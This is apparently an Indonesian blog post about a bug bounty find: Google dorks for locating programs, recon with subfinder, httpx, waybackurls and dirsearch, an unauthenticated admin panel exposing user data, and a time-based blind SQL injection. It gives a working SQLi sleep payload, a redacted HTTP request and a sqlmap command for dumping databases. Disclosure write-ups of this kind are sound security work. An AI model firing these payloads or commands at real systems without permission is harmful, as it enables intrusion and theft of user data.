Halo, Saya Anta Maulana atau Parkerzanta di dunia maya. Kali ini saya akan menuliskan tentang temuan saya di Web yang mengadakan Bug Bounty Program.
Saya menemukan pada bulan April lalu, dan menemukan 2 Kerentanan Critical yaitu SQL Injection dan Unauthorized Access to Admin Panel atau Otorisasi masuk tidak sah ke halaman Panel admin, saya dapat masuk tanpa dimintai kredensial apapaun!
Saya menemukan 2 kerentanan di atas tidak memakan banyak waktu, bisa dihitung hanya beberapa menit dengan bantuan Tools di bawah ini untuk Recon
- Subfinder
- Httpx
- Waybackurls
- Dirsearch
- Sqlmap
Mencari Program Bug Bounty
Saya mencari sebuah program Bug bounty menggunakan Goole Dork berikut
inurl:/bug bounty
inurl:/security
inurl:security.txt
inurl:security "reward"
Bug Bounty program "reward"
inurl:/responsible disclosure
inurl:/responsible-disclosure/ reward
inurl:/responsible-disclosure/ swag
inurl:/responsible-disclosure/ bounty
responsible disclosure "reward" site:com
responsible disclosure hall of fame
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
Setelah melakukan pencarian pada Google, saya memfilter untuk hasil pencarian untuk mencari program yang baru di publish beberapa minggu atau bulan lalu, seperti gambar di bawah
Apa itu Akses Tidak Sah ke Panel Admin?
Akses tidak sah ke panel admin terjadi ketika seseorang berhasil mendapatkan akses ke area administrator dari situs web Anda tanpa izin. Dengan akses ini, mereka dapat mengubah pengaturan situs web, menghapus atau menambahkan konten, atau bahkan mencuri informasi sensitif. Serangan semacam ini dapat memiliki dampak yang serius pada reputasi dan integritas situs web Anda.
Salah satu cara yang umum digunakan
oleh penyerang untuk mendapatkan akses tidak sah ke panel admin adalah
dengan menebak kata sandi yang lemah atau menggunakan metode "brute
force" untuk menebak kata sandi yang kuat. Selain itu, penyerang juga
dapat memanfaatkan kerentanan dalam perangkat lunak CMS yang digunakan
oleh situs web Anda.
Cerita singkat menemukan Panel Admin
Sebelum melakukan pencarian Kerentanan saya melakukan sebuah pencarian Subdomain terlebih dahulu menggunakan Subfinder dan HTTPX untuk melihat Status Code dari Subdomain. Target mempunya banyak nama subdomain sebagai berikut
Dan saya menemukan sebuah nama subdomain xeon4.redacted.com dengan respon 200 namun ketika saya membuka nama subdomain di atas, halaman tersebut hanya menampilkan text berikut
Bingung karna ini tidak menampilkan apapun:/ Saya melanjutkan pencarian titik akhir menggunakan Waybackurl namun itu hanya menampilkan file robots.txt 😐Saya tidak menyerah begitu saja, saya melakukan sebuah Pencarian Direktori dengan bantuan Tools Dirsearch
Dan apa yang bisa kalian tebak? yahhh, saya menemukan sebuah direktori Panel Admin! Dirsearch menunjukan Respon 200 untuk Direktori /adminpage Yang saya pikirkan adalah kemungkinan ini akan meminta sebuah username dan kata sandi untuk login.
Namun, ketika saya membuka direktori tersebut saya dapat masuk ke Halaman Panel Admin tanpa dimintai Kredensial apapun di xeon4.redacted.com/adminpage
Bisa kalian lihat di atas, di Halaman Admin terdepat Kredensial lain untuk masuk ke halaman lain, dan juga ada beberapa halaman yang menampilkan sebuah Informasi Sensitif pengguna lain seperti Email, Credit Card, Alamat dll.
Untuk temuan ini saya diberi hadiah sebesar $1000
Apa itu Serangan SQL Injection?
Serangan SQL injection adalah serangan yang dilakukan dengan memanfaatkan kerentanan dalam database situs web Anda. Dalam serangan ini, penyerang menyisipkan kode SQL berbahaya ke dalam input yang terkait dengan database, yang kemudian dieksekusi oleh server database. Serangan semacam ini dapat menyebabkan akses tidak sah ke data sensitif, perusakan basis data, atau bahkan pengambilalihan kontrol atas server.
Bagaimana saya menemukan SQL Injection
Mari kita lanjutkan, setelah saya menemukan sebuah Halaman Admin saya tidak berhenti disitu dan memutuskan untuk mencari kerentanan lain.
Saya menemukan sebuah subdomain lain yang saya temukan dari Halaman Admin di atas, lihat URL yang saya tutupi di bawah
Saya membuka tautan di atas, dan halaman tersebut menampilkan sebuah form dimana saya dapat melakukan pencarian Dokumen, lihat gambar di bawah
Saya mencegat permintaan saat melakukan pencarian dokumen, pada Parameter directform Rentan terhadap serangan SQL Injection dan saya menemukan sebuah Kerentanan SQLI Time Based Blind dengan melakukan Test dengan Payload
'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
Request
POST /xxxx/repository/xxxx? HTTP/2
Host: secure.redacted.com
Cookie: cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: https://secure.redacted.com
Referer: https://secure.redacted.com/xxxx/repository/xxxxx?
[...]
password=xxxxxx&directform=vulnerabilityhere
Respons
'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
'XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR'Z
sqlmap -r request.txt -p directform --random-agent --level 5 --risk 3 --dbs --threads=10
3 komentar